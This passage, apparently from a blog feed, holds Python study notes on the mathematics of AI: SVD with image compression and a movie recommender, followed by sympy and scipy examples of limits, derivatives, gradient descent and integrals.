    4
    5
    6
    7
    8
    9
    10
    11
    12
    sigmal_val, U = np.linalg.eigh(A.dot(A.T))  # 计算特征值, 左奇异矩阵
    sigmal_sort_id = np.argsort(sigmal_val)[::-1] # 让特征值降序排列
    sigmal_val = np.sort(sigmal_val)[::-1] # 特征值对应的特征向量也对应排序
    U = U[:, sigmal_sort_id] # 左奇异矩阵按这个 id 排序
    sigmal = np.diag(np.sqrt(sigmal_val)) # 计算奇异值矩阵(方阵)
    sigmal_inv = np.linalg.inv(sigmal) # 奇异值矩阵的逆矩阵
    V_part_T = sigmal_inv.dot(U.T).dot(A) # 右奇异矩阵

    print("AAT=:\n", AAT)
    print("左奇异矩阵: \n", U)
    print("奇异值矩阵: \n", np.round(sigmal, 2))
    print("右奇异矩阵的转置(部分):\n", np.round(V_part_T, 6))
    AAT=: [[1 1 0] [1 2 1] [0 1 1]]左奇异矩阵:  [[ 4.08248290e-01 -7.07106781e-01  5.77350269e-01] [ 8.16496581e-01 -7.58447699e-17 -5.77350269e-01] [ 4.08248290e-01  7.07106781e-01  5.77350269e-01]]奇异值矩阵:  [[1.73 0.   0.  ] [0.   1.   0.  ] [0.   0.   0.  ]]右奇异矩阵的转置(部分): [[ 0.707107  0.707107] [ 0.707107 -0.707107] [ 0.        0.      ]]
    1
    np.round(U.dot(sigmal).dot(V_part_T), 2)
    array([[0., 1.],       [1., 1.],       [1., 0.]])

    不研究了, 费劲, 怪不得考研不考, 电脑都鼓捣老半天, 别说手算了

    使用 numpy.linalg.svd 进行 SVD

U, s, VT = np.linalg.svd(A)
Sigma = np.zeros(np.shape(A))  # start from a zero matrix...
Sigma[:len(s), :len(s)] = np.diag(s)  # ...and place the singular values on its diagonal
print("left singular matrix: \n", U)
print("singular values:\n", s)
print("singular value matrix: \n", Sigma)
print("transposed right singular matrix:\n", VT)
left singular matrix:
 [[-4.08248290e-01  7.07106781e-01  5.77350269e-01]
 [-8.16496581e-01  5.55111512e-17 -5.77350269e-01]
 [-4.08248290e-01 -7.07106781e-01  5.77350269e-01]]
singular values:
 [1.73205081 1.        ]
singular value matrix:
 [[1.73205081 0.        ]
 [0.         1.        ]
 [0.         0.        ]]
transposed right singular matrix:
 [[-0.70710678 -0.70710678]
 [-0.70710678  0.70710678]]
np.round(U.dot(Sigma).dot(VT), 2)
array([[ 0.,  1.],
       [ 1.,  1.],
       [ 1., -0.]])

6.5.4 Matrix approximation with SVD

For the matrix $A$ below, the first two eigenvalues produced by the SVD (i.e. the squared singular values) are large (343 and 25) while the last one is small (3.37). By choosing different values of $k$ (taking the first $k$ columns of $U$, truncating $\Sigma$ to a $k \times k$ block, and keeping the first $k$ rows of $V^T$), we can compare the matrix rebuilt from the product against the original data

import numpy as np

A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
A
array([[ 1,  5,  7,  6,  1],
       [ 2,  1, 10,  4,  4],
       [ 3,  6,  7,  5,  2]])
U, s, VT = np.linalg.svd(A)
Sigma = np.zeros(np.shape(A))  # start from a zero matrix...
Sigma[:len(s), :len(s)] = np.diag(s)  # ...and place the singular values on its diagonal

for k in range(3, 0, -1):
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    print("k=", k, "compressed matrix: \n", np.round(D, 1))
k= 3 compressed matrix:
 [[ 1.  5.  7.  6.  1.]
 [ 2.  1. 10.  4.  4.]
 [ 3.  6.  7.  5.  2.]]
k= 2 compressed matrix:
 [[ 2.   5.4  6.8  5.3  1.5]
 [ 2.   1.  10.   4.   4. ]
 [ 2.1  5.7  7.2  5.6  1.5]]
k= 1 compressed matrix:
 [[1.9 3.8 7.7 4.8 2.3]
 [2.1 4.1 8.2 5.1 2.4]
 [2.  4.  8.1 5.  2.4]]

By picking a suitable $k$ and keeping only the larger singular values with their singular vectors, a good approximation of the matrix can be achieved with much less data.
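
One way to judge a suitable $k$ is to look at the relative Frobenius error of each rank-$k$ truncation; a small sketch on the same matrix:

import numpy as np

A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
U, s, VT = np.linalg.svd(A)
for k in range(1, len(s) + 1):
    D = U[:, :k].dot(np.diag(s[:k])).dot(VT[:k, :])  # rank-k approximation
    err = np.linalg.norm(A - D) / np.linalg.norm(A)  # relative Frobenius error
    print(k, round(err, 4))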

6.6 Worked example 1: compressing an image with SVD

from PIL import Image
import numpy as np
import matplotlib.pyplot as plt


def get_approx_SVD1(data, percent):
    """
    SVD, then rebuild the data from the singular values whose sum stays
    within a given percentage of the total singular-value sum
    :param data: original matrix
    :param percent: percentage of the singular-value sum to keep
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    count = int(sum(s)) * percent  # target share of the singular-value sum (int() keeps it strictly below the full sum so the loop terminates)
    k = -1
    curSum = 0  # running sum of the singular values taken so far
    while curSum <= count:  # keep adding singular values while the budget allows
        k += 1
        curSum += s[k]
    # k ends as the largest prefix length whose singular-value sum stays within the budget
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))  # first k columns of U, leading k*k block of Sigma, first k rows of VT
    D[D < 0] = 0  # clamp to the valid color range
    D[D > 255] = 255
    # numpy.rint() rounds each element to the nearest integer
    return np.rint(D).astype("uint8")


def get_approx_SVD2(data, percent):
    """
    SVD, then rebuild the data from a given percentage of the number of singular values
    :param data: original matrix
    :param percent: percentage of the singular-value count to keep
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    k = int(percent * len(s))  # keep the k largest singular values
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    D[D < 0] = 0
    D[D > 255] = 255
    return np.rint(D).astype("uint8")


def rebuild_img(filename, p, get_approx_SVD, index):
    """
    Load an image, compress each channel with SVD, and rebuild the image
    :param filename: file name
    :param p: percentage
    :param get_approx_SVD: the SVD truncation method to call
    :param index: subplot index for display
    """
    img = Image.open(filename, 'r')
    a = np.array(img)
    R0 = a[:, :, 0]  # red channel
    G0 = a[:, :, 1]  # green channel
    B0 = a[:, :, 2]  # blue channel
    R = get_approx_SVD(R0, p)
    G = get_approx_SVD(G0, p)
    B = get_approx_SVD(B0, p)
    I = np.stack((R, G, B), 2)

    # display the image
    plt.subplot(2, 5, index)
    if get_approx_SVD == get_approx_SVD1:
        plt.title("SVD1 " + str(int(p * 100)) + '%')
    else:
        plt.title("SVD2 " + str(int(p * 100)) + '%')
    plt.imshow(I)
    plt.axis('off')


if __name__ == "__main__":
    filename = "lenna.bmp"
    plt.figure(figsize=(10, 5))
    index = 0
    for p in np.arange(0.2, 1.2, 0.2):
        index += 1
        rebuild_img(filename, p, get_approx_SVD1, index)
    for p in np.arange(0.2, 1.2, 0.2):
        index += 1
        rebuild_img(filename, p, get_approx_SVD2, index)
    plt.show()

[Figure: the reconstructed images for SVD1 and SVD2 at 20%-100%]

6.7 Worked example 2: recommending products with SVD

Preparation: import the relevant libraries

import numpy as np
from numpy import linalg as la
import pandas as pd
import time

1 Load the test data set: the loadExData() function

def loadExData():
    """
    Rows: users
    Columns: movies
    Values: the user's rating of the movie; 0 means not yet rated
    :return: the csv converted to an np.array
    """
    """
    pd.read_csv():
    sep: the separator used when reading the csv file; defaults to a comma.
    header: sets the column names (first row) of the imported DataFrame; defaults to "infer"
    """
    return np.array(pd.read_csv("评分.csv", sep=",", header=None))

2 Compute similarities: the ecludSim() (Euclidean distance), pearsSim() (Pearson correlation coefficient), and cosSim() (cosine similarity) functions

• The Euclidean distance is just the two-point distance formula; its range is $[0, +\infty)$, so it is squashed into $(0, 1]$ below

• The Pearson correlation coefficient should be the $r$ from probability theory and mathematical statistics (I remember crashing my calculator with this feature back in middle school); its range is $[-1, 1]$

• Cosine similarity is the cosine of the angle between two vectors; 0 means the vectors are orthogonal, i.e. uncorrelated; its range is $[-1, 1]$

• Euclidean distance: $dist(\mathbf{X}, \mathbf{Y}) = \left \| \mathbf{X} - \mathbf{Y} \right \| $

• Pearson correlation coefficient: $r = \frac{( \mathbf{X-\bar{X}} ) \cdot ( \mathbf{Y-\bar{Y}} )}
  {\left \| \mathbf{X-\bar{X}} \right \| \cdot \left \| \mathbf{Y-\bar{Y}} \right \|} $

• Cosine similarity: $\cos\theta = \frac{\mathbf{X} \cdot \mathbf{Y}}{\left \| \mathbf{X} \right \| \cdot \left \| \mathbf{Y} \right \|}$

• Min-max normalization: $x' = \frac{x - \min(x)}{\max(x) - \min(x)}$

"""
All three measures below take 1-D arrays (vectors) X and Y; the closer the returned value is to 1, the stronger the correlation
"""


def ecludSim(X, Y):
    """
    Similarity from the Euclidean distance, normalized into (0, 1]
    """
    return 1.0 / (1.0 + la.norm(X - Y))


def pearsSim(X, Y):
    """
    Similarity from the Pearson correlation coefficient, normalized into [0, 1]
    """
    if len(X) < 3:  # fixed: the original read len(X < 3), which is the array length and therefore always truthy, so the function always returned 1.0
        return 1.0
    else:
        return 0.5 + 0.5 * np.corrcoef(X, Y, rowvar=1)[0][1]


def cosSim(X, Y):
    """
    Similarity from the cosine similarity, normalized into [0, 1]
    """
    return 0.5 + 0.5 * (float(X.dot(Y)) / (la.norm(X) * la.norm(Y)))
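
A quick usage check on two toy vectors (a sketch; it assumes the three functions above, with the len(X) fix, are already defined in the session):

X = np.array([5.0, 3.0, 4.0])
Y = np.array([4.0, 3.0, 5.0])
print(ecludSim(X, Y))  # well below 1: the vectors differ by sqrt(2)
print(pearsSim(X, Y))  # 0.5 + 0.5 * the correlation coefficient
print(cosSim(X, Y))    # close to 1: the vectors point almost the same way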

3 Reduce the matrix's dimensionality: the svd_item() function

1. Compute the number k of singular values to keep: the SigmaPct() function
def SigmaPct(sigma, percentage):
    """
    Determine k so that the first k singular values account for a fraction
    `percentage` of the total sum of squared singular values;
    used below to reduce the dimensionality of the raw item matrix for the SVD
    """
    sum_sigma = sum(sigma ** 2)
    sum_sigma1 = sum_sigma * percentage  # target share of the total sum of squared singular values
    sum_sigma2 = 0
    k = 0
    for i in sigma:
        sum_sigma2 += i * i
        k += 1
        if sum_sigma2 >= sum_sigma1:
            return k
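
A usage sketch: for singular values (3, 2, 1) the cumulative squared sums are 9, 13, 14, so with percentage = 0.9 the threshold 12.6 is first reached at k = 2:

print(SigmaPct(np.array([3.0, 2.0, 1.0]), 0.9))  # 2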
2. The dimensionality reduction itself: the svd_item() function
def svd_item(data, percentage):
    """
    Dimensionality reduction
    :return: the item data in the reduced space
    """
    n = np.shape(data)[1]  # number of item types (columns)
    U, s, VT = la.svd(data)  # SVD of the data set; s holds the diagonal values
    k = SigmaPct(s, percentage)  # the first k singular values already carry `percentage` of the energy
    Sigma = np.eye(k) * s[:k]  # build the diagonal matrix
    # map the data into the k-dimensional (low-dimensional) space and build the transformed items
    return data.T.dot(U[:, :k].dot(la.inv(Sigma)))  # item data in the reduced space

4 Predict the rating of one item the user has not rated yet, in the reduced space: the svd_predict() function

$$ P _ {uj} = \frac {\sum _ {i \in item1} W _ {ji} r _ {ui}}{\sum _ {i \in item1}W _ {ji}} $$

• Here $P _ {uj}$ is the predicted rating of item $j$ for user $u$, $item1$ is the set of items the user has already rated, $W _ {ji}$ is the similarity between items $j$ and $i$, and $r _ {ui}$ is user $u$'s rating of item $i$
• In words: the more similar an item (as a vector, under the chosen similarity measure) is to the items the user has historically liked (rated highly), the higher it is likely to rank in the user's recommendation list. A tiny numeric instance follows.
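
A tiny worked instance of the formula (the ratings and similarities are hypothetical):

w = np.array([0.9, 0.1])  # similarities W_ji of the two rated items to the target item j
r = np.array([5.0, 3.0])  # the user's ratings r_ui of those items
print(w.dot(r) / w.sum())  # 4.8: pulled toward the rating of the more similar item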
def svd_predict(data, user, simMeas, FormedItems, item):
    """
    Predict a user's rating of an unrated item from item-item similarity
    :param data: the rating matrix (rows are users, columns are items)
    :param user: user index
    :param simMeas: similarity function
    :param FormedItems: the items mapped into the reduced k-dimensional space
    :param item: index of the item to predict
    :return: the predicted rating, used afterwards to sort the candidates
    """
    n = np.shape(data)[1]  # number of item types in the data set (columns)
    Totalsim = 0.0  # running sum of similarities
    TotalratSim = 0.0  # running sum of similarity * rating
    # iterate over the items in the given user's row,
    # i.e. compare every item the user has rated against the target item and compute similarities
    for j in range(n):
        # the given user's rating of item j
        Rating_user = data[user, j]
        # only rated items other than the target item itself contribute
        if Rating_user != 0 and j != item:
            # similarity between item `item` and item j in the SVD-transformed space;
            # the similarity measure itself is passed in as a parameter
            Similarity = simMeas(FormedItems[item, :], FormedItems[j, :])
            Totalsim += Similarity  # accumulate the similarities
            TotalratSim += Similarity * Rating_user  # accumulate similarity * rating
    if Totalsim == 0:
        return 0
    else:
        return TotalratSim / Totalsim  # predicted rating, used afterwards to sort the candidates

5 Produce the N items with the highest predicted ratings, returning item indices and predicted scores: the recommend() function

def recommend(data, user, FormedItems, N, simMeas):
    # build the list of items the user has not rated yet
    unratedItems = np.array(np.nonzero(data[user, :] == 0))[0]
    if len(unratedItems) == 0:
        return "You have already rated every item"  # nothing left to rate, so bail out
    Scoresitem = []
    for item in unratedItems:  # predict a rating for every unrated item
        # compute the predicted score
        estimatedScore = svd_predict(data, user, simMeas, FormedItems, item)
        Scoresitem.append((item, estimatedScore))  # record the item and its score
    Scoresitem = sorted(Scoresitem, key=lambda x: x[1], reverse=True)  # sort by score, descending
    return Scoresitem[:N]  # return the N highest-scoring items

6 Recommend products to a given user: the recommend_predict() function.

def recommend_predict():
    user_item = loadExData()  # read the data
    percentage = 0.9  # share of the sum of squared singular values to keep
    user = 1  # the user to predict for
    n = 4  # number of recommendations
    FormedItems = svd_item(user_item, percentage)  # items after SVD dimensionality reduction

    s_t = time.time()
    simMeas = cosSim  # similarity measure
    r1 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendation using cosine similarity:')
    print("recommended item indices:", r1, "\nelapsed:", time.time() - s_t)

    s_t = time.time()
    simMeas = ecludSim
    r2 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendation using Euclidean distance:')
    print("recommended item indices:", r2, "\nelapsed:", time.time() - s_t)

    s_t = time.time()
    simMeas = pearsSim
    r3 = recommend(user_item, user, FormedItems, n, simMeas)
    print('SVD recommendation using the Pearson correlation coefficient:')
    print("recommended item indices:", r3, "\nelapsed:", time.time() - s_t)

7 Call recommend_predict() to get the results.

if __name__ == "__main__":
    recommend_predict()
SVD recommendation using cosine similarity:
recommended item indices: [(1605, 3.7280993014041743), (935, 3.72778748418618), (366, 3.7274892395964807), (812, 3.7260645630753846)]
elapsed: 1.6344106197357178
SVD recommendation using Euclidean distance:
recommended item indices: [(8, 3.690142726938304), (514, 3.689943318086311), (14, 3.6894721117751406), (172, 3.689287056157151)]
elapsed: 1.240149736404419
SVD recommendation using the Pearson correlation coefficient:
recommended item indices: [(1, 3.7096774193548385), (2, 3.7096774193548385), (3, 3.7096774193548385), (4, 3.7096774193548385)]
elapsed: 0.8249673843383789

(The identical Pearson scores are an artifact of the len(X < 3) bug noted above: in the recorded run the similarity was always 1.0, which reduces the prediction to a plain average of the user's ratings.)

6.8.2 Building the user-movie rating matrix

import numpy as np
import pandas as pd

# 1. Read the data set; header = [user id, movie id, rating (integer), submission time in seconds]
header = ["user_id", "item_id", "rating", "timestamp"]
data = pd.read_csv("u.data", sep="\t", names=header)  # read u.data as csv, tab-separated, with the column names above
# 2. Build the user-item rating matrix
# Check for duplicate user-item rating records (data cleaning)
# data.duplicated() # returns booleans marking the positions of duplicates
data.duplicated(subset=["user_id", "item_id"]).sum()  # number of duplicates
item_id_user = data.groupby("item_id").count()["user_id"]  # table of (item id, number of rating users)
print(item_id_user)
# build the user-item matrix
users_num = data.user_id.max()  # taking the largest id also sidesteps duplicate records
items_num = data.item_id.max()
user_item_rating = np.zeros((users_num, items_num))
for line in data.itertuples():  # itertuples() iterates over the DataFrame as tuples
    # assign ratings tuple by tuple
    user_item_rating[line[1] - 1, line[2] - 1] = line[3]
# save the user-movie rating matrix as a comma-separated text file
np.savetxt("评分 2.csv", user_item_rating, delimiter=",")
# print the first 5 rows of u.data
data.head()
item_id
1       452
2       131
3        90
4       209
5        86
       ...
1678      1
1679      1
1680      1
1681      1
1682      1
Name: user_id, Length: 1682, dtype: int64
    user_id item_id rating timestamp
    0 196 242 3 881250949
    1 186 302 3 891717742
    2 22 377 1 878887116
    3 244 51 2 880606923
    4 166 346 1 886397596
# print the size of u.data
print("data set size", data.shape)
# print the numbers of users and movies
print("users =", users_num)
print("movies =", items_num)
print("users * movies:", users_num * items_num)
# inspect the nonzero entries of user_item_rating
print("nonzero entries in user_item_rating:", len(user_item_rating.nonzero()[1]))
print("nonzero entries of user_item_rating:", user_item_rating.nonzero()[1])
# sparsity of the generated user_item_rating matrix
sparsity = round(len(user_item_rating.nonzero()[1]) / float(users_num * items_num), 3)
print("sparsity of user_item_rating:", sparsity)
print("size of user_item_rating", user_item_rating.shape)
# show the user-movie rating matrix as a table: columns are movies, rows are users
pd.DataFrame(user_item_rating)
data set size (100000, 4)
users = 943
movies = 1682
users * movies: 1586126
nonzero entries in user_item_rating: 100000
nonzero entries of user_item_rating: [   0    1    2 ... 1187 1227 1329]
sparsity of user_item_rating: 0.063
size of user_item_rating (943, 1682)
    0 1 2 3 4 5 6 7 8 9 ... 1672 1673 1674 1675 1676 1677 1678 1679 1680 1681
    0 5.0 3.0 4.0 3.0 3.0 5.0 4.0 1.0 5.0 3.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 4.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 2.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 4.0 3.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...
    938 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    939 0.0 0.0 0.0 2.0 0.0 0.0 4.0 5.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    940 5.0 0.0 0.0 0.0 0.0 0.0 4.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    941 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    942 0.0 5.0 0.0 0.0 0.0 0.0 0.0 0.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0

    943 rows × 1682 columns
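
With only about 6.3% of the entries nonzero, the dense matrix wastes a lot of memory; a sketch of a sparse alternative (assuming SciPy is available, reusing the user_item_rating built above):

from scipy.sparse import csr_matrix

sparse_rating = csr_matrix(user_item_rating)  # stores only the 100000 nonzero ratings
print(sparse_rating.shape, sparse_rating.nnz)  # (943, 1682) 100000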

    ]]>
@@ -10158,7 +10158,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(2-4)/ - Foreword
• I bought 迪哥's《人工智能数学基础》and, having got the basics of Python down, started working through it
• Much of it is postgraduate entrance exam math, which made me realize math is not as "useless" as I imagined
• Python ships many ready-made mathematical tools. The many formulas in the body use LaTeX, with 在线 LaTeX 公式编辑器-编辑器 (latexlive.com) as a reference; it's a pity I never met these tools as an undergraduate
• Some LaTeX still does not render correctly; it will have to do for now

1 Basics

2 Foundations of higher mathematics

Example 2.6 Find the limit $\lim_{x \to 1}\frac{x ^ 2 - 1}{x - 1}$

import sympy
from sympy import oo
import numpy as np
x = sympy.Symbol('x')
f = (x ** 2 - 1) / (x - 1)
sympy.limit(f, x, 1)  # limit(expression, variable, value the variable approaches)

    $\displaystyle 2$

Example 2.11 Find the derivative of $y = \arcsin\sqrt{\sin x}$

$y'=\frac{1}{\sqrt{1-\sin x} }\cdot\frac{1}{2\sqrt{\sin x}}\cdot{\cos x}=\frac{\cos x}{2\sqrt{\sin x-\sin^2x}}$

from sympy import *
from sympy.abc import x  # import the variable x
diff(asin(sqrt(sin(x))))  # diff computes the derivative

    $\displaystyle \frac{\cos{\left(x \right)}}{2 \sqrt{1 - \sin{\left(x \right)}} \sqrt{\sin{\left(x \right)}}}$

Example 2.12 Find the partial derivatives of $f(x,y)=x^2+3xy+y^2$ at the point $(1,2)$

$f_{x}(x,y)=2x+3y$

$f _{y}(x,y)=3x+2y$

$ f _{x}(1,2)=(2x+3y)\big| _{x=1,y=2}=8$

$f _{y}(1,2)=(3x+2y)\big| _{x=1,y=2}=7$

from sympy import *
from sympy.abc import x, y, f
f = x ** 2 + 3 * x * y + y ** 2
diff(f, x)  # partial derivative with respect to x

    $\displaystyle 2 x + 3 y$

    diff(f, y)

    $\displaystyle 3 x + 2 y$

fx = diff(f, x)
fx.evalf(subs={x:1, y:2})  # pass the variable values as a dict; returns the evaluated expression.

    $\displaystyle 8.0$

    fy = diff(f, y)
    fy.evalf(subs={x:1, y:2})

    $\displaystyle 7.0$

2.6 Directional derivatives, 2.7 Gradient

The gradient of a function at a point is a vector; it points in the direction of the largest directional derivative

$\operatorname{grad} f(x,y)=\frac{\partial f}{\partial x}\textbf{i}+\frac{\partial f}{\partial y}\textbf{j} $

$\frac{\partial f}{\partial l}=\operatorname{grad} f\cdot \frac{\overrightarrow{l}}{\left | \overrightarrow{l} \right | }$

Dotting the gradient with the unit vector of $l$ gives the directional derivative; this is the simplest way to compute one
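
A minimal numeric sketch of that formula, for $f(x, y) = x^2 + y^2$ at $(1, 2)$ along the direction $(1, \sqrt{3})$:

import numpy as np

grad = np.array([2.0, 4.0])  # grad f at (1, 2): (2x, 2y)
l = np.array([1.0, 3 ** 0.5])  # the direction vector
print(grad.dot(l / np.linalg.norm(l)))  # 1 + 2*sqrt(3), about 4.4641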

Example 2.15 Use Python to find the minimum of $f(x,y)=x-y+2x^2+2xy+y^2$ by gradient descent

First, the conventional approach:

$z=x-y+2x^2+2xy+y^2$

$z'_{x}=1+4x+2y$

$z'_{y}=-1+2x+2y$

which gives the stationary point $(-1,\frac{3}{2})$

$A=z''_{xx}\big| _{x=-1,y=\frac{3}{2}}=4$

$B=z''_{xy}\big| _ {x=-1,y=\frac{3}{2}}=2$

$C=z''_{yy}\big| _ {x=-1,y=\frac{3}{2}}=2$

$AC-B^2>0$

$A>0$

so the function has a local minimum at $(-1,\frac{3}{2})$

import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np


def Fun(x, y):  # the function itself
    return x - y + 2 * x * x + 2 * x * y + y * y


def PxFun(x, y):  # partial derivative with respect to x
    return 1 + 4 * x + 2 * y


def PyFun(x, y):  # partial derivative with respect to y
    return -1 + 2 * x + 2 * y


if __name__ == "__main__":
    fig = plt.figure()  # create a figure
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False)  # create the 3D axes
    fig.add_axes(ax)
    # mgrid builds the dense multi-dimensional grid needed for 3D plots
    # np.mgrid[start:stop:step] (a complex step means number of points, both ends included; a real step means spacing, half-open)
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z: data values as 2D arrays
    # rstride: array row stride
    # cstride: array column stride
    # cmap: colormap for the surface patches
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x')  # axis labels
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # gradient descent
    step = 0.008  # step size
    x = 0  # starting point
    y = 0
    tag_x = [x]  # lists of points for plotting
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
        new_x -= step * PxFun(x, y)  # step against the direction of steepest ascent
        new_y -= step * PyFun(x, y)
        if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
            Over = True
        x = new_x  # update the current point
        y = new_y
        tag_x.append(x)  # record the point for plotting
        tag_y.append(y)
        tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+')  # plot the points: 'r' means red (doesn't seem to take effect?); the original 'r+]' was a typo
    print('(x, y)~(' + str(x) + ',' + str(y) + ')')  # print the result
    plt.show()  # show the figure

    (x, y)~(-0.9993608094022046,1.498965767887478)

[Figure: the surface of f(x, y) with the gradient-descent path marked]

2.9.5 Pro tips: three ways to differentiate

Given $f(x)=x^5+2x^4+3x^2+5$, find $f'(1)$

Using Sympy's diff function
import sympy
from sympy.abc import x, f

f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
fx = sympy.diff(f)
fx.evalf(subs={x:1})

    $\displaystyle 19.0$

Using the derivative function from scipy.misc
import numpy as np
from scipy.misc import derivative


def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

derivative(func=f, x0=1, dx=1e-6, n=1)  # function f, evaluated at 1, spacing 1e-6, first derivative
18.999999999991246
Using NumPy's poly1d to build $f(x)$
import numpy as np

p = np.poly1d([1, 2, 0, 3, 0, 5])  # build the polynomial
np.polyder(p, 1)(1.0)  # first derivative evaluated at x=1.0
19.0
p.deriv(1)(1.0)  # first derivative evaluated at x=1.0
19.0

2.10 Exercises

$\lim_{x\to1}\sin(\ln x)$
    import sympy
    from sympy.abc import x, f

    f = sympy.sin(sympy.log(x))
    sympy.limit(f, x, 1)

    $\displaystyle 0$

$\lim_{x\to8}\frac{\sqrt[3]{x}-2}{x-8}$
    import sympy
    from sympy.abc import x, f

    f = (x ** (1/3) - 2) / (x - 8)
    sympy.limit(f, x, 8)

    $\displaystyle \frac{1}{12}$

Find the derivative of $y=x^4-2x^3+5\sin x+\ln 3$
import sympy
from sympy.abc import x, y

y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
sympy.diff(y)

    $\displaystyle 4 x^{3} - 6 x^{2} + 5 \cos{\left(x \right)}$

Find the partial derivatives of $z=(3x^2+y^2)^{4x+2y}$ at the point $(1,2)$

$\ln z=(4x+2y)\cdot \ln(3x^2+y^2)$

$\frac1zdz=\left[4\ln(3x^2+y^2)+\frac{24x^2+12xy}{3x^2+y^2}\right]dx+\left[2\ln(3x^2+y^2)+\frac{8xy+4y^2}{3x^2+y^2}\right]dy$

    import sympy
    from sympy.abc import x, y, z

    z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
    zx = sympy.diff(z, x)
    zx

$\displaystyle \left(3 x^{2} + y^{2}\right)^{4 x + 2 y} \left(\frac{6 x \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 4 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    zx.evalf(subs={x:1, y:2})

    $\displaystyle 84401203.0927369$

    zy = sympy.diff(z, y)
    zy

$\displaystyle \left(3 x^{2} + y^{2}\right)^{4 x + 2 y} \left(\frac{2 y \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 2 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    zy.evalf(subs={x:1, y:2})

    $\displaystyle 48788945.5463684$

Directional derivative and gradient

Find the directional derivative of $z=x^2+y^2$ at the point $(1,2)$ in the direction from $(1,2)$ to $(2,2+\sqrt{3})$, and the gradient at $(1,2)$

import sympy as sp
import numpy as np
from sympy.abc import x, y, z

z = x ** 2 + y ** 2
zx, zy = z.diff(x), z.diff(y)
gradz = np.array([zx.evalf(subs={x:1, y:2}), zy.evalf(subs={x:1, y:2})], dtype=float)  # the gradient
gradz
array([2., 4.])
A = np.array([1, 2])
B = np.array([2, 2 + 3 ** 0.5], dtype=float)
gradz.dot((B - A) / np.linalg.norm(B - A))  # directional derivative = gradient . unit vector (the original used *, which yields the componentwise terms [1., 3.46410162] instead of their sum)
4.464101615137754

3 Calculus

Example 3.6 Definite integrals

Use the SciPy scientific computing library to evaluate $\int_{0}^{3} \cos^2(e^x)\,dx$

import numpy as np
from scipy.integrate import quad

func = lambda x: np.cos(np.exp(x)) ** 2  # the integrand
quad(func, 0, 3)  # call the quad integration routine
(1.296467785724373, 1.397797133112089e-09)

The output is (integral value, error estimate)
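
quad also accepts infinite limits; a small sketch with the Gaussian integral, whose value over $[0, \infty)$ is $\sqrt{\pi}/2 \approx 0.8862$:

import numpy as np
from scipy.integrate import quad

print(quad(lambda x: np.exp(-x ** 2), 0, np.inf))  # (about 0.8862, tiny error estimate)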

Example 3.7 Double integrals

Evaluate $\iint_{D}e^{-x^2-y^2}\,dx\,dy$, where $D=\left \{ (x,y) \mid 0 \le x \le 10, 0 \le y \le 10\right \}$

import numpy as np
from scipy.integrate import dblquad  # double integration


def integrand(x, y):
    return np.exp(-x ** 2 - y ** 2)

x_a = 0
x_b = 10
y_a = 0
y_b = 10
"""
